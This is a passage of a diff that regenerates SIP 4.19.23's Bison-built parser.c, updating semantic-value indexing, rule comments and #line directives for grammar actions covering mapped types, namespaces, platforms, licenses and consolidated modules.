(1)].codeb)); ++ appendCodeBlock(¤tMappedType->iff->hdrcode, (yyvsp[0].codeb)); + } ++#line 3410 "../parser.c" + break; + +- case 114: +-#line 1257 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 114: /* mtline: typecode */ ++#line 1258 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tMappedType->typecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tMappedType->typecode, (yyvsp[0].codeb)); + } ++#line 3419 "../parser.c" + break; + +- case 115: +-#line 1261 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 115: /* mtline: TK_FROMTYPE codeblock */ ++#line 1262 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->convfromcode != NULL) + yyerror("%MappedType has more than one %ConvertFromTypeCode directive"); + +- appendCodeBlock(¤tMappedType->convfromcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tMappedType->convfromcode, (yyvsp[0].codeb)); + } + } ++#line 3433 "../parser.c" + break; + +- case 116: +-#line 1270 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 116: /* mtline: TK_TOTYPE codeblock */ ++#line 1271 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->convtocode != NULL) + yyerror("%MappedType has more than one %ConvertToTypeCode directive"); + +- appendCodeBlock(¤tMappedType->convtocode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tMappedType->convtocode, (yyvsp[0].codeb)); + } + } ++#line 3447 "../parser.c" + break; + +- case 117: +-#line 1279 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 117: /* mtline: instancecode */ ++#line 1280 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->instancecode != NULL) + yyerror("%MappedType has more than one %InstanceCode directive"); + +- appendCodeBlock(¤tMappedType->instancecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tMappedType->instancecode, (yyvsp[0].codeb)); + } + } ++#line 3461 "../parser.c" + break; + +- case 120: +-#line 1292 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 120: /* mtfunction: TK_STATIC cpptype TK_NAME_VALUE '(' arglist ')' optconst optexceptions optflags optsig ';' optdocstring premethodcode methodcode */ ++#line 1293 "parser.y" ++ { + if (notSkipping()) + { +- applyTypeFlags(currentModule, &(yyvsp[(2) - (14)].memArg), &(yyvsp[(9) - (14)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-12].memArg), &(yyvsp[-5].optflags)); + +- (yyvsp[(5) - (14)].signature).result = (yyvsp[(2) - (14)].memArg); ++ (yyvsp[-9].signature).result = (yyvsp[-12].memArg); + + newFunction(currentSpec, currentModule, NULL, NULL, +- currentMappedType, 0, TRUE, FALSE, FALSE, FALSE, (yyvsp[(3) - (14)].text), +- &(yyvsp[(5) - (14)].signature), (yyvsp[(7) - (14)].number), FALSE, &(yyvsp[(9) - (14)].optflags), (yyvsp[(14) - (14)].codeb), NULL, NULL, (yyvsp[(8) - (14)].throwlist), (yyvsp[(10) - (14)].optsignature), (yyvsp[(12) - (14)].docstr), +- FALSE, (yyvsp[(13) - (14)].codeb)); ++ currentMappedType, 0, TRUE, FALSE, FALSE, FALSE, (yyvsp[-11].text), ++ &(yyvsp[-9].signature), (yyvsp[-7].number), FALSE, &(yyvsp[-5].optflags), (yyvsp[0].codeb), NULL, NULL, (yyvsp[-6].throwlist), (yyvsp[-4].optsignature), (yyvsp[-2].docstr), ++ FALSE, (yyvsp[-1].codeb)); + } + } ++#line 3479 "../parser.c" + break; + +- case 121: +-#line 1307 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 121: /* $@4: %empty */ ++#line 1308 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("namespace definition not allowed in a C module"); + +@@ -3848,18 +3495,19 @@ yyreduce: + scope = NULL; + + ns = newClass(currentSpec, namespace_iface, NULL, +- text2scopedName(scope, (yyvsp[(2) - (2)].text)), NULL, NULL, NULL, NULL); ++ text2scopedName(scope, (yyvsp[0].text)), NULL, NULL, NULL, NULL); + + pushScope(ns); + + sectionFlags = 0; + } + } ++#line 3506 "../parser.c" + break; + +- case 122: +-#line 1328 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 122: /* namespace: TK_NAMESPACE TK_NAME_VALUE $@4 optnsbody ';' */ ++#line 1329 "parser.y" ++ { + if (notSkipping()) + { + if (inMainModule()) +@@ -3873,11 +3521,12 @@ yyreduce: + popScope(); + } + } ++#line 3525 "../parser.c" + break; + +- case 127: +-#line 1352 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 127: /* $@5: %empty */ ++#line 1353 "parser.y" ++ { + if (notSkipping()) + { + qualDef *qd; +@@ -3887,11 +3536,12 @@ yyreduce: + yyerror("%Platforms has already been defined for this module"); + } + } ++#line 3540 "../parser.c" + break; + +- case 128: +-#line 1362 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 128: /* platforms: TK_PLATFORMS $@5 '{' platformlist '}' */ ++#line 1363 "parser.y" ++ { + if (notSkipping()) + { + qualDef *qd; +@@ -3908,71 +3558,79 @@ yyreduce: + yyerror("No more than one of these %Platforms must be specified with the -t flag"); + } + } ++#line 3562 "../parser.c" + break; + +- case 131: +-#line 1385 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[(1) - (1)].text), ++ case 131: /* platform: TK_NAME_VALUE */ ++#line 1386 "parser.y" ++ { ++ newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[0].text), + platform_qualifier); + } ++#line 3571 "../parser.c" + break; + +- case 132: +-#line 1391 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[(2) - (2)].feature).name, ++ case 132: /* feature: TK_FEATURE feature_args */ ++#line 1392 "parser.y" ++ { ++ newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[0].feature).name, + feature_qualifier); + } ++#line 3580 "../parser.c" + break; + +- case 133: +-#line 1397 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 133: /* feature_args: TK_NAME_VALUE */ ++#line 1398 "parser.y" ++ { + resetLexerState(); + +- (yyval.feature).name = (yyvsp[(1) - (1)].text); ++ (yyval.feature).name = (yyvsp[0].text); + } ++#line 3590 "../parser.c" + break; + +- case 134: +-#line 1402 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.feature) = (yyvsp[(2) - (3)].feature); ++ case 134: /* feature_args: '(' feature_arg_list ')' */ ++#line 1403 "parser.y" ++ { ++ (yyval.feature) = (yyvsp[-1].feature); + } ++#line 3598 "../parser.c" + break; + +- case 136: +-#line 1408 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.feature) = (yyvsp[(1) - (3)].feature); ++ case 136: /* feature_arg_list: feature_arg_list ',' feature_arg */ ++#line 1409 "parser.y" ++ { ++ (yyval.feature) = (yyvsp[-2].feature); + +- switch ((yyvsp[(3) - (3)].feature).token) ++ switch ((yyvsp[0].feature).token) + { +- case TK_NAME: (yyval.feature).name = (yyvsp[(3) - (3)].feature).name; break; ++ case TK_NAME: (yyval.feature).name = (yyvsp[0].feature).name; break; + } + } ++#line 3611 "../parser.c" + break; + +- case 137: +-#line 1418 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 137: /* feature_arg: TK_NAME '=' name_or_string */ ++#line 1419 "parser.y" ++ { + (yyval.feature).token = TK_NAME; + +- (yyval.feature).name = (yyvsp[(3) - (3)].text); ++ (yyval.feature).name = (yyvsp[0].text); + } ++#line 3621 "../parser.c" + break; + +- case 138: +-#line 1425 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 138: /* $@6: %empty */ ++#line 1426 "parser.y" ++ { + currentTimelineOrder = 0; + } ++#line 3629 "../parser.c" + break; + +- case 139: +-#line 1428 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 139: /* timeline: TK_TIMELINE $@6 '{' qualifierlist '}' */ ++#line 1429 "parser.y" ++ { + if (notSkipping()) + { + qualDef *qd; +@@ -3993,129 +3651,140 @@ yyreduce: + currentModule->nrtimelines++; + } + } ++#line 3655 "../parser.c" + break; + +- case 142: +-#line 1455 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 142: /* qualifiername: TK_NAME_VALUE */ ++#line 1456 "parser.y" ++ { + newQualifier(currentModule, currentModule->nrtimelines, +- currentTimelineOrder++, TRUE, (yyvsp[(1) - (1)].text), time_qualifier); ++ currentTimelineOrder++, TRUE, (yyvsp[0].text), time_qualifier); + } ++#line 3664 "../parser.c" + break; + +- case 143: +-#line 1461 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 143: /* $@7: %empty */ ++#line 1462 "parser.y" ++ { + currentPlatforms = NULL; + } ++#line 3672 "../parser.c" + break; + +- case 144: +-#line 1463 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 144: /* ifstart: TK_IF '(' $@7 qualifiers ')' */ ++#line 1464 "parser.y" ++ { + if (stackPtr >= MAX_NESTED_IF) + yyerror("Internal error: increase the value of MAX_NESTED_IF"); + + /* Nested %Ifs are implicit logical ands. */ + + if (stackPtr > 0) +- (yyvsp[(4) - (5)].boolean) = ((yyvsp[(4) - (5)].boolean) && skipStack[stackPtr - 1]); ++ (yyvsp[-1].boolean) = ((yyvsp[-1].boolean) && skipStack[stackPtr - 1]); + +- skipStack[stackPtr] = (yyvsp[(4) - (5)].boolean); ++ skipStack[stackPtr] = (yyvsp[-1].boolean); + + platformStack[stackPtr] = currentPlatforms; + + ++stackPtr; + } ++#line 3692 "../parser.c" + break; + +- case 145: +-#line 1480 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = platOrFeature((yyvsp[(1) - (1)].text), FALSE); ++ case 145: /* oredqualifiers: TK_NAME_VALUE */ ++#line 1481 "parser.y" ++ { ++ (yyval.boolean) = platOrFeature((yyvsp[0].text), FALSE); + } ++#line 3700 "../parser.c" + break; + +- case 146: +-#line 1483 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = platOrFeature((yyvsp[(2) - (2)].text), TRUE); ++ case 146: /* oredqualifiers: '!' TK_NAME_VALUE */ ++#line 1484 "parser.y" ++ { ++ (yyval.boolean) = platOrFeature((yyvsp[0].text), TRUE); + } ++#line 3708 "../parser.c" + break; + +- case 147: +-#line 1486 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = (platOrFeature((yyvsp[(3) - (3)].text), FALSE) || (yyvsp[(1) - (3)].boolean)); ++ case 147: /* oredqualifiers: oredqualifiers TK_LOGICAL_OR TK_NAME_VALUE */ ++#line 1487 "parser.y" ++ { ++ (yyval.boolean) = (platOrFeature((yyvsp[0].text), FALSE) || (yyvsp[-2].boolean)); + } ++#line 3716 "../parser.c" + break; + +- case 148: +-#line 1489 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = (platOrFeature((yyvsp[(4) - (4)].text), TRUE) || (yyvsp[(1) - (4)].boolean)); ++ case 148: /* oredqualifiers: oredqualifiers TK_LOGICAL_OR '!' TK_NAME_VALUE */ ++#line 1490 "parser.y" ++ { ++ (yyval.boolean) = (platOrFeature((yyvsp[0].text), TRUE) || (yyvsp[-3].boolean)); + } ++#line 3724 "../parser.c" + break; + +- case 150: +-#line 1495 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = timePeriod((yyvsp[(1) - (3)].text), (yyvsp[(3) - (3)].text)); ++ case 150: /* qualifiers: optname '-' optname */ ++#line 1496 "parser.y" ++ { ++ (yyval.boolean) = timePeriod((yyvsp[-2].text), (yyvsp[0].text)); + } ++#line 3732 "../parser.c" + break; + +- case 151: +-#line 1500 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 151: /* ifend: TK_END */ ++#line 1501 "parser.y" ++ { + if (stackPtr-- <= 0) + yyerror("Too many %End directives"); + + currentPlatforms = (stackPtr == 0 ? NULL : platformStack[stackPtr - 1]); + } ++#line 3743 "../parser.c" + break; + +- case 152: +-#line 1508 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 152: /* license: TK_LICENSE license_args optflags */ ++#line 1509 "parser.y" ++ { + optFlag *of; + +- if ((yyvsp[(3) - (3)].optflags).nrFlags != 0) ++ if ((yyvsp[0].optflags).nrFlags != 0) + deprecated("%License annotations are deprecated, use arguments instead"); + +- if ((yyvsp[(2) - (3)].license).type == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Type", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).type = of->fvalue.sval; +- +- if ((yyvsp[(2) - (3)].license).licensee == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Licensee", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).licensee = of->fvalue.sval; +- +- if ((yyvsp[(2) - (3)].license).signature == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Signature", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).signature = of->fvalue.sval; +- +- if ((yyvsp[(2) - (3)].license).timestamp == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Timestamp", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).timestamp = of->fvalue.sval; ++ if ((yyvsp[-1].license).type == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Type", string_flag)) != NULL) ++ (yyvsp[-1].license).type = of->fvalue.sval; ++ ++ if ((yyvsp[-1].license).licensee == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Licensee", string_flag)) != NULL) ++ (yyvsp[-1].license).licensee = of->fvalue.sval; ++ ++ if ((yyvsp[-1].license).signature == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Signature", string_flag)) != NULL) ++ (yyvsp[-1].license).signature = of->fvalue.sval; ++ ++ if ((yyvsp[-1].license).timestamp == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Timestamp", string_flag)) != NULL) ++ (yyvsp[-1].license).timestamp = of->fvalue.sval; + +- if ((yyvsp[(2) - (3)].license).type == NULL) ++ if ((yyvsp[-1].license).type == NULL) + yyerror("%License must have a 'type' argument"); + + if (notSkipping()) + { + currentModule->license = sipMalloc(sizeof (licenseDef)); + +- currentModule->license->type = (yyvsp[(2) - (3)].license).type; +- currentModule->license->licensee = (yyvsp[(2) - (3)].license).licensee; +- currentModule->license->sig = (yyvsp[(2) - (3)].license).signature; +- currentModule->license->timestamp = (yyvsp[(2) - (3)].license).timestamp; ++ currentModule->license->type = (yyvsp[-1].license).type; ++ currentModule->license->licensee = (yyvsp[-1].license).licensee; ++ currentModule->license->sig = (yyvsp[-1].license).signature; ++ currentModule->license->timestamp = (yyvsp[-1].license).timestamp; + } + } ++#line 3783 "../parser.c" + break; + +- case 153: +-#line 1545 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 153: /* license_args: %empty */ ++#line 1546 "parser.y" ++ { + resetLexerState(); + + (yyval.license).type = NULL; +@@ -4123,242 +3792,265 @@ yyreduce: + (yyval.license).signature = NULL; + (yyval.license).timestamp = NULL; + } ++#line 3796 "../parser.c" + break; + +- case 154: +-#line 1553 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.license).type = (yyvsp[(1) - (1)].text); ++ case 154: /* license_args: TK_STRING_VALUE */ ++#line 1554 "parser.y" ++ { ++ (yyval.license).type = (yyvsp[0].text); + (yyval.license).licensee = NULL; + (yyval.license).signature = NULL; + (yyval.license).timestamp = NULL; + } ++#line 3807 "../parser.c" + break; + +- case 155: +-#line 1559 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.license) = (yyvsp[(2) - (3)].license); ++ case 155: /* license_args: '(' license_arg_list ')' */ ++#line 1560 "parser.y" ++ { ++ (yyval.license) = (yyvsp[-1].license); + } ++#line 3815 "../parser.c" + break; + +- case 157: +-#line 1565 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.license) = (yyvsp[(1) - (3)].license); ++ case 157: /* license_arg_list: license_arg_list ',' license_arg */ ++#line 1566 "parser.y" ++ { ++ (yyval.license) = (yyvsp[-2].license); + +- switch ((yyvsp[(3) - (3)].license).token) ++ switch ((yyvsp[0].license).token) + { +- case TK_TYPE: (yyval.license).type = (yyvsp[(3) - (3)].license).type; break; +- case TK_LICENSEE: (yyval.license).licensee = (yyvsp[(3) - (3)].license).licensee; break; +- case TK_SIGNATURE: (yyval.license).signature = (yyvsp[(3) - (3)].license).signature; break; +- case TK_TIMESTAMP: (yyval.license).timestamp = (yyvsp[(3) - (3)].license).timestamp; break; ++ case TK_TYPE: (yyval.license).type = (yyvsp[0].license).type; break; ++ case TK_LICENSEE: (yyval.license).licensee = (yyvsp[0].license).licensee; break; ++ case TK_SIGNATURE: (yyval.license).signature = (yyvsp[0].license).signature; break; ++ case TK_TIMESTAMP: (yyval.license).timestamp = (yyvsp[0].license).timestamp; break; + } + } ++#line 3831 "../parser.c" + break; + +- case 158: +-#line 1578 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 158: /* license_arg: TK_TYPE '=' TK_STRING_VALUE */ ++#line 1579 "parser.y" ++ { + (yyval.license).token = TK_NAME; + +- (yyval.license).type = (yyvsp[(3) - (3)].text); ++ (yyval.license).type = (yyvsp[0].text); + (yyval.license).licensee = NULL; + (yyval.license).signature = NULL; + (yyval.license).timestamp = NULL; + } ++#line 3844 "../parser.c" + break; + +- case 159: +-#line 1586 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 159: /* license_arg: TK_LICENSEE '=' TK_STRING_VALUE */ ++#line 1587 "parser.y" ++ { + (yyval.license).token = TK_LICENSEE; + + (yyval.license).type = NULL; +- (yyval.license).licensee = (yyvsp[(3) - (3)].text); ++ (yyval.license).licensee = (yyvsp[0].text); + (yyval.license).signature = NULL; + (yyval.license).timestamp = NULL; + } ++#line 3857 "../parser.c" + break; + +- case 160: +-#line 1594 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 160: /* license_arg: TK_SIGNATURE '=' TK_STRING_VALUE */ ++#line 1595 "parser.y" ++ { + (yyval.license).token = TK_SIGNATURE; + + (yyval.license).type = NULL; + (yyval.license).licensee = NULL; +- (yyval.license).signature = (yyvsp[(3) - (3)].text); ++ (yyval.license).signature = (yyvsp[0].text); + (yyval.license).timestamp = NULL; + } ++#line 3870 "../parser.c" + break; + +- case 161: +-#line 1602 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 161: /* license_arg: TK_TIMESTAMP '=' TK_STRING_VALUE */ ++#line 1603 "parser.y" ++ { + (yyval.license).token = TK_TIMESTAMP; + + (yyval.license).type = NULL; + (yyval.license).licensee = NULL; + (yyval.license).signature = NULL; +- (yyval.license).timestamp = (yyvsp[(3) - (3)].text); ++ (yyval.license).timestamp = (yyvsp[0].text); + } ++#line 3883 "../parser.c" + break; + +- case 162: +-#line 1612 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 162: /* defmetatype: TK_DEFMETATYPE defmetatype_args */ ++#line 1613 "parser.y" ++ { + if (notSkipping()) + { + if (currentModule->defmetatype != NULL) + yyerror("%DefaultMetatype has already been defined for this module"); + +- currentModule->defmetatype = cacheName(currentSpec, (yyvsp[(2) - (2)].defmetatype).name); ++ currentModule->defmetatype = cacheName(currentSpec, (yyvsp[0].defmetatype).name); + } + } ++#line 3897 "../parser.c" + break; + +- case 163: +-#line 1623 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 163: /* defmetatype_args: dottedname */ ++#line 1624 "parser.y" ++ { + resetLexerState(); + +- (yyval.defmetatype).name = (yyvsp[(1) - (1)].text); ++ (yyval.defmetatype).name = (yyvsp[0].text); + } ++#line 3907 "../parser.c" + break; + +- case 164: +-#line 1628 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defmetatype) = (yyvsp[(2) - (3)].defmetatype); ++ case 164: /* defmetatype_args: '(' defmetatype_arg_list ')' */ ++#line 1629 "parser.y" ++ { ++ (yyval.defmetatype) = (yyvsp[-1].defmetatype); + } ++#line 3915 "../parser.c" + break; + +- case 166: +-#line 1634 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defmetatype) = (yyvsp[(1) - (3)].defmetatype); ++ case 166: /* defmetatype_arg_list: defmetatype_arg_list ',' defmetatype_arg */ ++#line 1635 "parser.y" ++ { ++ (yyval.defmetatype) = (yyvsp[-2].defmetatype); + +- switch ((yyvsp[(3) - (3)].defmetatype).token) ++ switch ((yyvsp[0].defmetatype).token) + { +- case TK_NAME: (yyval.defmetatype).name = (yyvsp[(3) - (3)].defmetatype).name; break; ++ case TK_NAME: (yyval.defmetatype).name = (yyvsp[0].defmetatype).name; break; + } + } ++#line 3928 "../parser.c" + break; + +- case 167: +-#line 1644 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 167: /* defmetatype_arg: TK_NAME '=' dottedname */ ++#line 1645 "parser.y" ++ { + (yyval.defmetatype).token = TK_NAME; + +- (yyval.defmetatype).name = (yyvsp[(3) - (3)].text); ++ (yyval.defmetatype).name = (yyvsp[0].text); + } ++#line 3938 "../parser.c" + break; + +- case 168: +-#line 1651 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 168: /* defsupertype: TK_DEFSUPERTYPE defsupertype_args */ ++#line 1652 "parser.y" ++ { + if (notSkipping()) + { + if (currentModule->defsupertype != NULL) + yyerror("%DefaultSupertype has already been defined for this module"); + +- currentModule->defsupertype = cacheName(currentSpec, (yyvsp[(2) - (2)].defsupertype).name); ++ currentModule->defsupertype = cacheName(currentSpec, (yyvsp[0].defsupertype).name); + } + } ++#line 3952 "../parser.c" + break; + +- case 169: +-#line 1662 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 169: /* defsupertype_args: dottedname */ ++#line 1663 "parser.y" ++ { + resetLexerState(); + +- (yyval.defsupertype).name = (yyvsp[(1) - (1)].text); ++ (yyval.defsupertype).name = (yyvsp[0].text); + } ++#line 3962 "../parser.c" + break; + +- case 170: +-#line 1667 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defsupertype) = (yyvsp[(2) - (3)].defsupertype); ++ case 170: /* defsupertype_args: '(' defsupertype_arg_list ')' */ ++#line 1668 "parser.y" ++ { ++ (yyval.defsupertype) = (yyvsp[-1].defsupertype); + } ++#line 3970 "../parser.c" + break; + +- case 172: +-#line 1673 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defsupertype) = (yyvsp[(1) - (3)].defsupertype); ++ case 172: /* defsupertype_arg_list: defsupertype_arg_list ',' defsupertype_arg */ ++#line 1674 "parser.y" ++ { ++ (yyval.defsupertype) = (yyvsp[-2].defsupertype); + +- switch ((yyvsp[(3) - (3)].defsupertype).token) ++ switch ((yyvsp[0].defsupertype).token) + { +- case TK_NAME: (yyval.defsupertype).name = (yyvsp[(3) - (3)].defsupertype).name; break; ++ case TK_NAME: (yyval.defsupertype).name = (yyvsp[0].defsupertype).name; break; + } + } ++#line 3983 "../parser.c" + break; + +- case 173: +-#line 1683 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 173: /* defsupertype_arg: TK_NAME '=' dottedname */ ++#line 1684 "parser.y" ++ { + (yyval.defsupertype).token = TK_NAME; + +- (yyval.defsupertype).name = (yyvsp[(3) - (3)].text); ++ (yyval.defsupertype).name = (yyvsp[0].text); + } ++#line 3993 "../parser.c" + break; + +- case 174: +-#line 1690 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 174: /* hiddenns: TK_HIDE_NS hiddenns_args */ ++#line 1691 "parser.y" ++ { + if (notSkipping()) + { + classDef *ns; + + ns = newClass(currentSpec, namespace_iface, NULL, +- fullyQualifiedName((yyvsp[(2) - (2)].hiddenns).name), NULL, NULL, NULL, NULL); ++ fullyQualifiedName((yyvsp[0].hiddenns).name), NULL, NULL, NULL, NULL); + setHiddenNamespace(ns); + } + } ++#line 4008 "../parser.c" + break; + +- case 175: +-#line 1702 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 175: /* hiddenns_args: scopedname */ ++#line 1703 "parser.y" ++ { + resetLexerState(); + +- (yyval.hiddenns).name = (yyvsp[(1) - (1)].scpvalp); ++ (yyval.hiddenns).name = (yyvsp[0].scpvalp); + } ++#line 4018 "../parser.c" + break; + +- case 176: +-#line 1707 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.hiddenns) = (yyvsp[(2) - (3)].hiddenns); ++ case 176: /* hiddenns_args: '(' hiddenns_arg_list ')' */ ++#line 1708 "parser.y" ++ { ++ (yyval.hiddenns) = (yyvsp[-1].hiddenns); + } ++#line 4026 "../parser.c" + break; + +- case 178: +-#line 1713 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.hiddenns) = (yyvsp[(1) - (3)].hiddenns); ++ case 178: /* hiddenns_arg_list: hiddenns_arg_list ',' hiddenns_arg */ ++#line 1714 "parser.y" ++ { ++ (yyval.hiddenns) = (yyvsp[-2].hiddenns); + +- switch ((yyvsp[(3) - (3)].hiddenns).token) ++ switch ((yyvsp[0].hiddenns).token) + { +- case TK_NAME: (yyval.hiddenns).name = (yyvsp[(3) - (3)].hiddenns).name; break; ++ case TK_NAME: (yyval.hiddenns).name = (yyvsp[0].hiddenns).name; break; + } + } ++#line 4039 "../parser.c" + break; + +- case 179: +-#line 1723 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 179: /* hiddenns_arg: TK_NAME '=' scopedname */ ++#line 1724 "parser.y" ++ { + (yyval.hiddenns).token = TK_NAME; + +- (yyval.hiddenns).name = (yyvsp[(3) - (3)].scpvalp); ++ (yyval.hiddenns).name = (yyvsp[0].scpvalp); + } ++#line 4049 "../parser.c" + break; + +- case 180: +-#line 1730 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 180: /* consmodule: TK_CONSMODULE consmodule_args consmodule_body */ ++#line 1731 "parser.y" ++ { + deprecated("%ConsolidatedModule is deprecated and will not be supported by SIP v5"); + + if (notSkipping()) +@@ -4370,99 +4062,109 @@ yyreduce: + if (currentModule->fullname != NULL) + yyerror("%ConsolidatedModule must appear before any %Module or %CModule directive"); + +- setModuleName(currentSpec, currentModule, (yyvsp[(2) - (3)].consmodule).name); +- currentModule->docstring = (yyvsp[(3) - (3)].consmodule).docstring; ++ setModuleName(currentSpec, currentModule, (yyvsp[-1].consmodule).name); ++ currentModule->docstring = (yyvsp[0].consmodule).docstring; + + setIsConsolidated(currentModule); + } + } ++#line 4072 "../parser.c" + break; + +- case 181: +-#line 1750 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 181: /* consmodule_args: dottedname */ ++#line 1751 "parser.y" ++ { + resetLexerState(); + +- (yyval.consmodule).name = (yyvsp[(1) - (1)].text); ++ (yyval.consmodule).name = (yyvsp[0].text); + } ++#line 4082 "../parser.c" + break; + +- case 182: +-#line 1755 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = (yyvsp[(2) - (3)].consmodule); ++ case 182: /* consmodule_args: '(' consmodule_arg_list ')' */ ++#line 1756 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-1].consmodule); + } ++#line 4090 "../parser.c" + break; + +- case 184: +-#line 1761 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = (yyvsp[(1) - (3)].consmodule); ++ case 184: /* consmodule_arg_list: consmodule_arg_list ',' consmodule_arg */ ++#line 1762 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-2].consmodule); + +- switch ((yyvsp[(3) - (3)].consmodule).token) ++ switch ((yyvsp[0].consmodule).token) + { +- case TK_NAME: (yyval.consmodule).name = (yyvsp[(3) - (3)].consmodule).name; break; ++ case TK_NAME: (yyval.consmodule).name = (yyvsp[0].consmodule).name; break; + } + } ++#line 4103 "../parser.c" + break; + +- case 185: +-#line 1771 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 185: /* consmodule_arg: TK_NAME '=' dottedname */ ++#line 1772 "parser.y" ++ { + (yyval.consmodule).token = TK_NAME; + +- (yyval.consmodule).name = (yyvsp[(3) - (3)].text); ++ (yyval.consmodule).name = (yyvsp[0].text); + } ++#line 4113 "../parser.c" + break; + +- case 186: +-#line 1778 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 186: /* consmodule_body: %empty */ ++#line 1779 "parser.y" ++ { + (yyval.consmodule).token = 0; + (yyval.consmodule).docstring = NULL; + } ++#line 4122 "../parser.c" + break; + +- case 187: +-#line 1782 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = (yyvsp[(2) - (4)].consmodule); ++ case 187: /* consmodule_body: '{' consmodule_body_directives '}' ';' */ ++#line 1783 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-2].consmodule); + } ++#line 4130 "../parser.c" + break; + +- case 189: +-#line 1788 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = (yyvsp[(1) - (2)].consmodule); ++ case 189: /* consmodule_body_directives: consmodule_body_directives consmodule_body_directive */ ++#line 1789 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-1].consmodule); + +- switch ((yyvsp[(2) - (2)].consmodule).token) ++ switch ((yyvsp[0].consmodule).token) + { +- case TK_DOCSTRING: (yyval.consmodule).docstring = (yyvsp[(2) - (2)].consmodule).docstring; break; ++ case TK_DOCSTRING: (yyval.consmodule).docstring = 